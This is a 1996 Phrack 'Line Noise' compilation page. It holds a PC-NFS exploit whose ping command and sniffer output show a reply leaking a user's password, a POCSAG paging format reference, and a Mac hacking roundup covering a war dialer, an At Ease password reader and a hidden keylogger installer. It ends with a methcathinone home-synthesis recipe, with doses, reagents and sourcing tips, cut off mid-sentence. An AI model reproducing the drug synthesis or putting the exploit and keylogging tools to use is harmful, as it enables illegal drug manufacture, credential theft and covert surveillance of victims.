[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Line Noise (Part I) ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ]
Current issue : #48 | Release date : 1996-01-09 | Editor : voyager
IntroductionPhrack Staff
Phrack Loopback / EditorialPhrack Staff
Line Noise (Part I)various
Line Noise (Part II)various
Phrack Pro-Philes on the New EditorsPhrack Staff
Motorola Command Mode InformationCherokee
Tandy / Radio Shack Cellular PhonesDamien Thorn
The Craft Access TerminalBoss Hogg
Information About NT's FMT-150/B/C/DStaTiC
Electronic Telephone Cards (Part I)unknown
Electronic Telephone Cards (Part II)unknown
Keytrap RevisitedSendai
Project Neptunedaemon9
IP-Spoofing Demystifieddaemon9
Netmondaemon9
The Truth...and Nothing but the TruthSteve Fleming
International Scenesvarious
Phrack World NewsDatastream Cowboy
Title : Line Noise (Part I)
Author : various
                         ==Phrack Magazine==

              Volume Seven, Issue Forty-Eight, File 3 of 18


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                Part I

------------------------------------------------------------------------------

PC-NFS Bug


I have found a nice little security hole in PC-NFS version 5.x.  If you 
ping a PC-NFS user with a packet size of between 1450 to 1480, the 
PC's ICMP reply packet will divulge:

	o The hostname of the PC
	o The hostname of the PC's authentication server
	o The username of the person logged in
	o The password for the user (Thank you very much!)

All of this information is in clear text unless PC-NFS's NETLOGIN is 
used.  NETLOGIN uses XOR as its encryption, so this is hardly secure 
either.

NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested 
and all freely return the above information on both PC-NFS versions 
5.0 and 5.1a.  This should work with other driver/NIC configurations 
also.

You get the occasional added bonus of locking up the victims PC as 
well!

This bug was new to Sun and they have created a new PCNFS.SYS 
driver for us.  They have labeled it PC-NFS.SYS version 5.1a.DOD.  
This new version fills reply ICMP packets with nulls after 200 bytes of
the requested pattern.

Until you receive this patch from Sun, I would recommend setting all 
external router interface MTU to a value of no greater than 1350 as this 
is point where secrets are contained in the return packet.

The Unix command to generate the below results is as follows:

	ping -s -c1 pchost.victim.com 1480

Use your favorite sniffer to filter ICMP packets and you have it.  If you 
don't have a sniffer, try the -v(erbose) option of ping and convert the 
hex to ascii starting around byte 1382.

Sniffer output follows:

19:03:48.81 
        ip: evil.com->pchost.victim.com
        icmp: echo request
        62: 024 025 026 027 030 031 032 033 034 035
        72: 036 037       !   "   #   $   %   &   '
        82:   (   )   *   +   ,   -   .   /   0   1
        92:   2   3   4   5   6   7   8   9   :   ;
        102:   <   =   >   ?   @   A   B   C   D   E
        112:   F   G   H   I   J   K   L   M   N   O
        122:   P   Q   R   S   T   U   V   W   X   Y
        132:   Z   [   \   ]   ^   _   `   a   b   c
        142:   d   e   f   g   h   i   j   k   l   m
        152:   n   o   p   q   r   s   t   u   v   w
        162:   x   y   z   {   |   }   ~ 177 200 201
        172: 202 203 204 205 206 207 210 211 212 213
        182: 214 215 216 217 220 221 222 223 224 225
        192: 226 227 230 231 232 233 234 235 236 237
        202: 240 241 242 243 244 245 246 247 250 251
        212: 252 253 254 255 256 257 260 261 262 263
        222: 264 265 266 267 270 271 272 273 274 275
        232: 276 277 300 301 302 303 304 305 306 307
        242: 310 311 312 313 314 315 316 317 320 321
        252: 322 323 324 325 326 327 330 331 332 333
        262: 334 335 336 337 340 341 342 343 344 345
        272: 346 347 350 351 352 353 354 355 356 357
        282: 360 361 362 363 364 365 366 367 370 371
        292: 372 373 374 375 376 377 000 001 002 003
        302: 004 005 006 007 010 011 012 013 014 015
        312: 016 017 020 021 022 023 024 025 026 027
        322: 030 031 032 033 034 035 036 037       !
        332:   "   #   $   %   &   '   (   )   *   +
        342:   ,   -   .   /   0   1   2   3   4   5
        352:   6   7   8   9   :   ;   <   =   >   ?
        362:   @   A   B   C   D   E   F   G   H   I
        372:   J   K   L   M   N   O   P   Q   R   S
        382:   T   U   V   W   X   Y   Z   [   \   ]
        392:   ^   _   `   a   b   c   d   e   f   g
        402:   h   i   j   k   l   m   n   o   p   q
        412:   r   s   t   u   v   w   x   y   z   {
        422:   |   }   ~ 177 200 201 202 203 204 205
        432: 206 207 210 211 212 213 214 215 216 217
        442: 220 221 222 223 224 225 226 227 230 231
        452: 232 233 234 235 236 237 240 241 242 243
        462: 244 245 246 247 250 251 252 253 254 255
        472: 256 257 260 261 262 263 264 265 266 267
        482: 270 271 272 273 274 275 276 277 300 301
        492: 302 303 304 305 306 307 310 311 312 313
        502: 314 315 316 317 320 321 322 323 324 325
        512: 326 327 330 331 332 333 334 335 336 337
        522: 340 341 342 343 344 345 346 347 350 351
        532: 352 353 354 355 356 357 360 361 362 363
        542: 364 365 366 367 370 371 372 373 374 375
        552: 376 377 000 001 002 003 004 005 006 007
        562: 010 011 012 013 014 015 016 017 020 021
        572: 022 023 024 025 026 027 030 031 032 033
        582: 034 035 036 037       !   "   #   $   %
        592:   &   '   (   )   *   +   ,   -   .   /
        602:   0   1   2   3   4   5   6   7   8   9
        612:   :   ;   <   =   >   ?   @   A   B   C
        622:   D   E   F   G   H   I   J   K   L   M
        632:   N   O   P   Q   R   S   T   U   V   W
        642:   X   Y   Z   [   \   ]   ^   _   `   a
        652:   b   c   d   e   f   g   h   i   j   k
        662:   l   m   n   o   p   q   r   s   t   u
        672:   v   w   x   y   z   {   |   }   ~ 177
        682: 200 201 202 203 204 205 206 207 210 211
        692: 212 213 214 215 216 217 220 221 222 223
        702: 224 225 226 227 230 231 232 233 234 235
        712: 236 237 240 241 242 243 244 245 246 247
        722: 250 251 252 253 254 255 256 257 260 261
        732: 262 263 264 265 266 267 270 271 272 273
        742: 274 275 276 277 300 301 302 303 304 305
        752: 306 307 310 311 312 313 314 315 316 317
        762: 320 321 322 323 324 325 326 327 330 331
        772: 332 333 334 335 336 337 340 341 342 343
        782: 344 345 346 347 350 351 352 353 354 355
        792: 356 357 360 361 362 363 364 365 366 367
        802: 370 371 372 373 374 375 376 377 000 001
        812: 002 003 004 005 006 007 010 011 012 013
        822: 014 015 016 017 020 021 022 023 024 025
        832: 026 027 030 031 032 033 034 035 036 037
        842:       !   "   #   $   %   &   '   (   )
        852:   *   +   ,   -   .   /   0   1   2   3
        862:   4   5   6   7   8   9   :   ;   <   =
        872:   >   ?   @   A   B   C   D   E   F   G
        882:   H   I   J   K   L   M   N   O   P   Q
        892:   R   S   T   U   V   W   X   Y   Z   [
        902:   \   ]   ^   _   `   a   b   c   d   e
        912:   f   g   h   i   j   k   l   m   n   o
        922:   p   q   r   s   t   u   v   w   x   y
        932:   z   {   |   }   ~ 177 200 201 202 203
        942: 204 205 206 207 210 211 212 213 214 215
        952: 216 217 220 221 222 223 224 225 226 227
        962: 230 231 232 233 234 235 236 237 240 241
        972: 242 243 244 245 246 247 250 251 252 253
        982: 254 255 256 257 260 261 262 263 264 265
        992: 266 267 270 271 272 273 274 275 276 277
        1002: 300 301 302 303 304 305 306 307 310 311
        1012: 312 313 314 315 316 317 320 321 322 323
        1022: 324 325 326 327 330 331 332 333 334 335
        1032: 336 337 340 341 342 343 344 345 346 347
        1042: 350 351 352 353 354 355 356 357 360 361
        1052: 362 363 364 365 366 367 370 371 372 373
        1062: 374 375 376 377 000 001 002 003 004 005
        1072: 006 007 010 011 012 013 014 015 016 017
        1082: 020 021 022 023 024 025 026 027 030 031
        1092: 032 033 034 035 036 037       !   "   #
        1102:   $   %   &   '   (   )   *   +   ,   -
        1112:   .   /   0   1   2   3   4   5   6   7
        1122:   8   9   :   ;   <   =   >   ?   @   A
        1132:   B   C   D   E   F   G   H   I   J   K
        1142:   L   M   N   O   P   Q   R   S   T   U
        1152:   V   W   X   Y   Z   [   \   ]   ^   _
        1162:   `   a   b   c   d   e   f   g   h   i
        1172:   j   k   l   m   n   o   p   q   r   s
        1182:   t   u   v   w   x   y   z   {   |   }
        1192:   ~ 177 200 201 202 203 204 205 206 207
        1202: 210 211 212 213 214 215 216 217 220 221
        1212: 222 223 224 225 226 227 230 231 232 233
        1222: 234 235 236 237 240 241 242 243 244 245
        1232: 246 247 250 251 252 253 254 255 256 257
        1242: 260 261 262 263 264 265 266 267 270 271
        1252: 272 273 274 275 276 277 300 301 302 303
        1262: 304 305 306 307 310 311 312 313 314 315
        1272: 316 317 320 321 322 323 324 325 326 327
        1282: 330 331 332 333 334 335 336 337 340 341
        1292: 342 343 344 345 346 347 350 351 352 353
        1302: 354 355 356 357 360 361 362 363 364 365
        1312: 366 367 370 371 372 373 374 375 376 377
        1322: 000 001 002 003 004 005 006 007 010 011
        1332: 012 013 014 015 016 017 020 021 022 023
        1342: 024 025 026 027 030 031 032 033 034 035
        1352: 036 037       !   "   #   $   %   &   '
        1362:   (   )   *   +   ,   -   .   /   0   1
        1372:   2   3   4   5   6   7   8   9   :   ;
        1382:   <   =   >   ?   @   A   B   C   D   E
        1392:   F   G   H   I   J   K   L   M   N   O
        1402:   P   Q   R   S   T   U   V   W   X   Y
        1412:   Z   [   \   ]   ^   _   `   a   b   c
        1422:   d   e   f   g   h   i   j   k   l   m
        1432:   n   o   p   q   r   s   t   u   v   w
        1442:   x   y   z   {   |   }   ~ 177 200 201
        1452: 202 203 204 205 206 207 210 211 212 213
        1462: 214 215 216 217 220 221 222 223 224 225
        1472: 226 227 230 231 232 233 234 235 236 237
        1482: 240 241 242 243 244 245 246 247 250 251

19:03:48.85 
        ip: pchost.victim.com->evil
        icmp: echo reply
        62: 024 025 026 027 030 031 032 033 034 035
        72: 036 037       !   "   #   $   %   &   '
        82:   (   )   *   +   ,   -   .   /   0   1
        92:   2   3   4   5   6   7   8   9   :   ;
        102:   <   =   >   ?   @   A   B   C   D   E
        112:   F   G   H   I   J   K   L   M   N   O
        122:   P   Q   R   S   T   U   V   W   X   Y
        132:   Z   [   \   ]   ^   _   `   a   b   c
        142:   d   e   f   g   h   i   j   k   l   m
        152:   n   o   p   q   r   s   t   u   v   w
        162:   x   y   z   {   |   }   ~ 177 200 201
        172: 202 203 204 205 206 207 210 211 212 213
        182: 214 215 216 217 220 221 222 223 224 225
        192: 226 227 230 231 232 233 234 235 236 237
        202: 240 241 242 243 244 245 246 247 250 251
        212: 252 253 254 255 256 257 260 261 262 263
        222: 264 265 266 267 270 271 272 273 274 275
        232: 276 277 300 301 302 303 304 305 306 307
        242: 310 311 312 313 314 315 316 317 320 321
        252: 322 323 324 325 000 000 324 005   ^   $
        262:   : 004 000 000 000 000 000 000 000 000
        272: 036 006   W   V   P   S   Q   R 016 007
        282: 277   ^   $ 213 367 350   X   p   r   c
        292: 212   E   "   < 000   u 005 350   V 003
        302: 353   W   < 005   u 005 350   W 002 353
        312:   N   < 010   u 007 306 006 325   # 001
        322: 353   H   < 015   u 007 306 006 325   #
        332: 001 353   =   < 017   u 007 306 006 325
        342:   # 001 353   2   < 022   u 005 350 021
        352: 002 353   $   < 003   u 005 350   9 003
        362: 353 033   < 022   w 017   2 344 213 360
        372: 212 204 300   #   P 350 225 305   X 353
        382: 010   P 270   c 000 350 213 305   X 306
        392: 006 205 347 000   Z   Y   [   X   ^   _
        402: 007 037 313   P   S   Q   R   U 036 006
        412:   W   V 214 310 216 330 216 300 306 006
        422: 325   # 000 373 277   ^   $ 273   A 347
        432: 271 006 000 215   6   d   $ 212 004 210
        442: 005 212 007 210 004   F   G   C 342 363
        452: 241   x   $ 243   |   $ 241   z   $ 243
        462:   ~   $ 241 324   ) 243   x   $ 241 326
        472:   ) 243   z   $ 277   ^   $ 212   E   "
        482:   < 010   u 015   P 270   ` 000 350   $
        492: 305   X 350 275 001 353 022   < 015   u
        502: 012   P 270   a 000 350 023 305   X 353
        512: 004   < 017   u 003 350 017 000 306 006
        522: 205 347 000   ^   _ 007 037   ]   Z   Y
        532:   [   X 303   P 270   < 000 350 363 304
        542:   X 307   E   $ 000 000 215   u   " 213
        552:   M 020 206 351 203 351 024 367 301 001
        562: 000   t 006 213 331 306 000 000   A 321
        572: 371 350   ,   o 211   ]   $ 307   E 030
        582: 000 000 215   u 016 271 012 000 350 033
        592:   o 211   ] 030 213   E 020 206 340 005
        602: 016 000 243   `   % 211   >   b   % 214
        612: 016   d   % 277   ^   %   . 376 006   ?
        622: 020 350   9 276   . 376 016   ? 020 303
        632:   & 213   E 002 013 300   t 020 243 326
        642:   #   & 213   ] 004 211 036 330   # 350
        652: 231   m 353   0 200   > 324   ) 000   t
        662: 033   & 203   } 006 000   t 024 203   >
        672: 326   # 000   u 015 350 031 000 203   >
        682: 326   # 000   t 003 350   u   m 241 326
        692:   #   & 211   E 002 241 330   #   & 211
        702:   E 004 303   & 213   M 006 006   V   W
        712: 016 007 272 000 000 277 334   # 350   $
        722: 000 241 323   # 243 350   X 203   > 326
        732:   # 000   u 023 366 006 343 015 001   u
        742: 014 203   > 350   X 000   u 353 272 001
        752: 000 342 332   _   ^ 007 303   Q   R   W
        762: 203 372 000   u 021 203   > 030 214 000
        772:   t 012 276 004 214 271 003 000 363 245
        782: 353 010 270 377 377 271 003 000 363 253
        792: 276   A 347 271 003 000 363 245   _ 270
        802: 377 377 211   E 036 211   E     241 324
        812:   ) 211   E 032 241 326   ) 211   E 034
        822: 270     000 206 340 211   E 020 306   E
        832: 016   E 306   E 017 000 307   E 022 000
        842: 000 307   E 024 000 000 306   E 026 002
        852: 306   E 027 001 307   E 014 010 000   3
        862: 300 306   E   " 021 210   E   # 211   E
        872:   & 211   E   ( 350 250 376   Z   Y 303
        882: 200   > 326   # 000   u 014 213   E   *
        892: 243 326   # 213   E   , 243 330   #   P
        902: 270   V 000 350 205 303   X 303   P   S
        912:   Q   R 213   E   : 213   ]   < 213   M
        922:   & 213   U   ( 350 223   k   Z   Y   [
        932:   X   P 270   \ 000 350   e 303   X 303
        942: 306   E   " 000   P 270   X 000 350   X
        952: 303   X 303   & 213   E 002   & 213   ]
        962: 004   & 213   U 006 006   W 016 007 350
        972:   Y   i   s 003 351 227 000 277 334   #
        982:   W 271 003 000 363 245 276   A 347 271
        992: 003 000 363 245   _ 211   E 036 211   ]
        1002:     241 324   ) 211   E 032 241 326   )
        1012: 211   E 034 270     000 206 340 211   E
        1022: 020 306   E 016   E 306   E 017 000 307
        1032:   E 022 000 000 307   E 024 000 000 306
        1042:   E 026 377 306   E 027 001 307   E 014
        1052: 010 000   3 300 306   E   " 010 210   E
        1062:   # 211   E   & 377 006   h   % 241   h
        1072:   % 211   E   ( 211 026 350   X 211 026
        1082:   l   % 307 006   j   % 000 000 350 322
        1092: 375 203   > 350   X 000   t   # 366 006
        1102: 343 015 001   u   ! 203   >   j   % 000
        1112:   t 353 203   >   j   % 001   u 011 241
        1122:   l   %   + 006 350   X 353 015 270 375
        1132: 377 353 010 270 376 377 353 003 270 377
        1142: 377 307 006   l   % 000 000   _ 007   &
        1152: 211   E 010 303   P 270   ^ 000 350 206
        1162: 302   X 203   >   l   % 000   t 017 213
        1172:   ]   (   ; 036   h   %   u 006 307 006
        1182:   j   % 001 000 303   P 270   ; 000 350
        1192:   g 302   X 203   >   l   % 000   t 006
        1202: 307 006   j   % 002 000 303 000 000 000
        1212: 000 000 000 000 000 000 000 000 000 000
        1222: 000 000 000 000 000 000 000 000 000 000
        1232: 000 000 000 000 000 000 000 000 000 000
        1242: 000 000 000 000 000 000 000 000 002 000
        1252: 000 000 300   A 000 000 034 000 000 000
        1262: 200 000 000 000   k 000 000 000 000 016
        1272: 000 000 000     000 000 000 000 000 000
        1282: 010 000 000 000 252 001 000 000 010   5
        1292: 000 000   r 027 301   . 000 000 000 000
        1302: 036   F 300   . 000 000 000 000 036   F
        1312: 300   . 000 000 000 000 000 000 000 000
        1322: 000 000 000 000 000 000 000 000 000 000
        1332: 000 000 000 000 000 000 000 000 000 000
        1342: 000 000 000 000 000 000 000 000 000    
        1352: 000 000 000 002 000 000 200 366   = 000
        1362:   { 255 023 000 242 265 015 000 002 000
        1372: 000 000   S 017 005 000   C 003 000 000
        1382:   p   c   h   o   s   t 000 000 000 000
        1392: 000 000 000 000 000 000 244   A   @   -
        1402:   s   e   r   v   e   r   1 000 000 000
        1412: 000 000 000 000 000 000 244   A   @ 001
        1422: 000 000 000 000 000 000 000 000 000 000
        1432: 000 000 000 000 000 000 244   A   @ 001
        1442:   u   s   e   r   n   a   m   e 000 000
        1452:   p   a   s   s   w   d 000 000 000 000
        1462: 000 000 000 000 000 000 000 000 000 000
        1472: 000 000 000 000 000 000 000 000 000 000
        1482: 000 000 200 000   k 000 260 271 377 377
        1492: 344 275   9 212

The names have been changed to protect the innocent, but the rest is actual.

Byte 1382:  PC's hostname
Byte 1402:  PC's Authentication server hostname
Byte 1382:  The user's account name.  Shows nobody if logged out.
Byte 1382:  The user's password.

------------------------------------------------------------------------------

		POCSAG paging format, code and code capacity

The POCSAG (Post Office Code Standardization Advisory Group) code is a
synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
structure. The POCSAG codes provides improved battery-saving capability and an
increased code capacity.
The POCSAG code format consists of a preamble and one or more batches of
codewords. Each batch comprises a 32-bit frame synchronization code and eight
64-bit address frames of two 32-bit addresses or idle codewords each. The
frame synchronization code marks the start of the batch of codewords.

-PREAMBLE STRUCTURE
The preamble consists of 576 bits of an alternating 101010 pattern transmitted
at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
determine if the data received is a POCSAG signal and for synchronization with
the stream of data.

       |---Preamble----|-----------First Batch-------------|--Subsec. Batch--|

        ______________________________________________________< <____________
paging |  576 bits of  | |   |   |   |   |   |   |   |   | |   > >           |
format |   reversals   |F| | | | | | | | | | | | | | | | |F|                 |
       | (101010, etc) |S| | | | | | | | | | | | | | | | |S|                 |
       |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
							       > >
1 FRAME = 2 CODEWORDS

		Preamble	Batchs

 512 BPS	1125 mS		1062.5 mS

1200 BPS	 480 mS		 453.3 mS

CodeWords Structure
        ____________________________________________________________________
BIT    |   |              |       |                       |                 |
NUMBER | 1 |   2 to 19    | 20,21 |       22 to 31        |        32       |
       |___|______________|_______|_______________________|_________________|
        ____________________________________________________________________
ADDRESS|   |              |       |                       |                 | 
FORMAT | 0 | Address Bits | S I B |   Parity Check Bits   |   Even parity   |
       |___|______________|_______|_______________________|_________________|
                              ^ 
                              Source identifier bits 
	____________________________________________________________________
MESSAGE|   |                      |                       |                 |
FORMAT | 1 |     Message Bits     |   Parity Check Bits   |   Even parity   |
       |___|______________________|_______________________|_________________|

-BATCH STRUCTURE
A batch consist of frame synchronization code follow by 8 frames of two address
codewords per frame (16 address codewords per batch). In order to maintain the
proper batch structure, each frame is filled with two address codewords, or two
idle codewords, or two message codewords, or any appropriate combination of the
three codewords types.

-FRAME SYNCHRONIZATION CODE STRUCTURE
The frame synchronization (FS) code is a unique, reserved word that is used to
identify the beginning of each batch. The FS code comprises the 32 bits:

	011111100110100100001010111011000.

-OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS
An alternate frame synchronization (AFS) code can be selected to support special
systems or systems that require increased coding capability. The AFS is
generated in the same manner as an address codeword (i.e., BCH codeword with
parity bits). The POCSAG signaling standard has reserved special codewords for
the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
system to support the AFS. The AFS will change to frame 0 on the programmer
since no frame information is included in the AFS. The AFS should use address
1 so that bit 20 and 21 are 0.

-ADDRESS CODEWORD STRUCTURE
An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
the address bits. The pagers looks at these bits to find its own unique
address. Each POCSAG codeword is capable of providing address information for
four different paging sources (Address 1 to 4). These address are determined
by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits
22 through 31 are the parity check bits, and bit 32 is the even parity bit.


		BIT 20	    BIT 21
Address 1         0	      0
Address 2         0           1
Address 3         1           0
Address 4         1           1

Pre-coded into the code plug are three bits which designate the frame location,
within each batch, at which the pager's address is to be received; the decoder
will look at the codewords in this frame for its address.
Power is removed from the receiver during all frames other than the precoded
one, thus extending pager battery life.

-CODE CAPACITY 
The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres
s 
bits are the most-significant bits.

-MESSAGE CODEWORD STRUCTURE
A message codeword structure always start with a 1 in bit 1 and always follows
directly after the address. Each message codeword replaces an address codeword
in the batch.

-IDLE CODEWORD STRUCTURE
The idle codeword is unique, reserved codeword used to talk place of an address
in any frame that would not otherwise be filled with 64 bits.
Thus, if a frame contains only an address, an idle codeword comprises the 32
bits:

01111010100010011100000110010111

-POCSAG CHARACTERS

CHAR	HEX	|	CHAR	HEX	|	CHAR	HEX	|
		|			|			|
#	23	|	$	24	|	@	40	|
[	5B	|	\	5C	|	]	5D	|
^	5E	|	_	5F	|	'	60	|
{	7B	|	|	7C	|	}	7D	|
~ 	7E	|	DEL	7F	|	SP	20	|

------------------------------------------------------------------------------

MACINTOSH HACKING
by Logik Bomb

"My fellow astronauts..."
-Dan Quayle

        Now, two people have mailed Erik Bloodaxe asking about Macintosh
hacking particularly war dialers, and each time he insulted Macs and tried
to get someone to write a file on it. No one has done it. So I guess I have
to.
        First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
originators of the Apple and the Macintosh were busted for phreaking in
college. The Apple IIe was used almost universally by hackers. So why has
the Mac fallen out of favor for hacking? Simple. Because it fell out of
favor for everything else. Apple screwed up and wouldn't let clone makers
license the MacOS. As a result, 80% of personal computers run DOS, and
Macintoshes are left in the minority. Second, DOS compatible users, and
hackers in particular, have an image of Mac users as a bunch of whiny
lamers who paid too much for a computer and as a result are constantly
defensive. The solution to this impression is to not be an asshole. I know
it drives every Mac user crazy when he reads some article about Windows
95's brand new, advanced features such as "plug-and-play" that the
Macintosh has had since 1984. But just try and take it. If it's any
consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
hate Windows too.
Now, on with the software.
-------------------------
Assault Dialer 1.5
        Assault Dialer, by Crush Commando, is the premier Mac war dialer,
the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
have right now.  It is the successor to a previous war dialer known as Holy
War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
1.0, and it wasn't as good as Assault Dialer, so that's your best bet right
now.

MacPGP 2.6.2 and PGPfone 1.0b4
        MacPGP is the Macintosh port of the infamous PGP (Pretty Good
Privacy.) This file is not about cryptography, so if you want to know about
PGP read the fuckin' read me and docs that come with the file. Strangely
enough, however, Phil Zimmerman released PGPfone, a utility for encrypting
your phone and making it a secure line, for the Mac _first._ I don't know
why, and I haven't had a chance to test it, but the idea's pretty cool. If
PGP doesn't get Zimmerman thrown in jail, this will.

DisEase 1.0 and DisEase 3.0
        Schools and concerned parents have always had a problem. Schools
can't have students deleting the hard drive, and parents don't want their
kids looking at the kinky pictures they downloaded. So Apple came out with
At Ease, an operating system that runs over System 7, sort of the same way
Windows runs off of DOS. However, I can't stand At Ease. Everything about
it, from the Fisher-Price screen to the interface drives me crazy. It
drives a lot of other people crazy too. So it was just a matter of time
before someone made a program to override it. The first was DisEase 1.0, a
small program by someone calling himself Omletman, that would override At
Ease if you put in a floppy loaded with it and clicked six times. Omletman
improved this design and eventually released 3.0. (I haven't been able to
find any evidence that a 2.0 was ever released) 3.0 has such cool features
as reading the preferences file to give you the password, so you can change
the obnoxious greeting teachers always put to something more sinister. The
only problem with 3.0 is that some configurations of At Ease only let
documents be read off of disks; no applications, which means DisEase 3.0
won't appear, and so you can't run it. However, with 1.0 you don't have to
actually open the application, you just click six times, so if you use 1.0
to get to the finder, and then 3.0 to read the passwords, things will work.

Invisible Oasis Installer
        Oasis is a keystroke recorder, so you can find out passwords.
However, with the original Oasis, you had to put it in the Extensions
folder and make it invisible with ResEdit, which takes a while. Invisible
Oasis Installer, however, installs it where it should be and automatically
makes it invisible.
"So everything's wrapped up in a nice neat little _package_, then?"
-Homer Simpson

Anonymity 2.0 and Repersonalize 1.0
        Anonymity, version 1.2, was a rather old program whose author has
long been forgotten that was the best data fork alterer available. It
removed the personalization to programs. However, in around 1990 someone
named the Doctor made 2.0, a version with some improvements. Repersonalize
was made in 1988 (God, Mac hacking programs are old) which reset
personalization on some of the Microsoft and Claris programs, so you could
enter a different personalization name. I don't know if it will still work
on Microsoft Word 6.0.1 and versions of programs released recently, but I
don't really care because I use Word 5.1a and I'm probably not going to
upgrade for a while.

Phoney (AKA Phoney4Mac)
        Phoney is an excellent program that emulates the Blue Box, Red Box,
Black Box and Green Box tones. There is also Phoney4Newton, which does the
same thing on the most portable of computers, the Newton.

        That's all I'm covering in this file as far as Mac hacking
programs. You'll probably want to know where to find all this crap, so here
are all of the Mac hacking ftp and Web sites I know of:
Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html)
        This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
It is probably the largest and best archive of Mac hacking software
connected to the Internet. The problem with this is that it can't handle
more than two anonymous users, meaning that unless you pay to be part of
L0pht, you will never get into this archive. I've tried getting up at 4:30
AM, thinking that no one in their right mind would possibly be awake at
this time, but there is always, somehow, somewhere, two people in Iceland
or Singapore or somewhere on this site.
The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html)
        This site does not look like much, and it is fairly obvious that
its maintainer, Sean Warren, is still learning HTML, but it is reliable and
is a good archive. It is still growing, probably due to the fact that it is
one of the only Internet Mac hacking sites anyone can get to and upload.
Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html)
        This is an excellent site and has many good programs. There is one
catch, however. It's maintainer, Ole Buzzard, is actually getting the files
from his BBS. So many of the really good files are locked away in the k0p
BBS, and those of us who can't pay long distance can't get the files. Oh
well.
Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
(http://www.lib.iup.edu/~seaman/index.html)
        While this is hardly a Macintosh hacking site, it's just a hacking
site, it does have very few Mac files, some of which are hard to get to.
However, Bone might get expelled because of a long story involving AOHell,
so this page might not be here. Then again, maybe Bone won't get expelled
and this site will stay. Never can tell 'bout the future, can you?
"We predict the future. We invent it."
        -Nasty government guy on the season premiere of _The X-Files_

Andy Ryder
Netsurfer and Road Warrior on the Info Highway
I've pestered Bruce Sterling _and_ R.U. Sirius!
As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
Once scored 29,013,920 points on Missile Command

"This Snow Crash thing- is it a virus, a drug, or a religion?"
        -Hiro Protagonist
"What's the difference?"
        -Juanita Marquez

"...one person's 'cyberpunk' is another's everyday obnoxious teenager with
some technical skill thrown in..."
        -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
"More than _some_ technical skill."
        -Andy Ryder

------------------------------------------------------------------------------


                            Making Methcathinone

                                  Compiled

                                by Anonymous


Ok, this has got to be the easiest drug made at home (by far).  This is very
similar to methamphetamine in structure, effect, and use.  Typical doses
start at 20mg up to 60mg.  Start low, go slow.  Cat can be taken orally (add
10 mg) or through mucous membranes (nasally).

Ingredients:
Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
Conc. Sulfuric acid - it's up to you where you get this.  Contact me if you
                      need help locating it.
Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
                                     is used for cleaning concrete.
Sodium Hydroxide - Hardware stores.  AKA lye.
Toluene - Hardware store, paint store.

Lab equipment:
1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
125 mL separatory funnel - same as above
glass tubing - same as above

Buchner funnel - This is a hard to find item, but must schools have at least
                 one.  They are usually white porcelain or plastic.  They look
                 like a funnel with a flat disk in the bottom with lots of
                 holes in it.  If you need one, arrangements can be made.
Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00

References to Edmund's Scientific Co, in NJ, are accurate.  You have to go 
to their "Lab Surplus/Mad Scientist" room.  The prices are incredible.  
This place is definitely a recommended stopping sight for anybody going 
through New Jersey.  It is located in "Barrington", about 30 minutes from 
center city Philadelphia.
All of the above can be purchased from "The Al-Chymist".  Their number is
(619)948-4150.  Their address is:       17525 Alder #49
                                       Hesperia, Ca 92345
      Call and ask for a catalog.

That's it.  The body of this article is stolen from the third edition of
"Secrets of Methamphetamine Manufacture" by Uncle Fester.  This is a tried
and proven method by many people.  If you want a copy of this book, contact
me.

                  Good luck and keep away from the DEA


                          M E T H C A T H I N O N E

             K I T C H E N    I M P R O V I E S E D    C R A N K


    The latest designer variant upon the amphetamine molecule to gain
popularity and publicity is methcathinone, commonly called cat.  This
substance is remarkably similar to the active ingredient found in the
leaves of the khat tree which the loyal drug warriors on the network news
blame for turning peace loving Somalis into murderous psychopaths.  The
active ingredient in the khat leaves is cathinone, which has the same
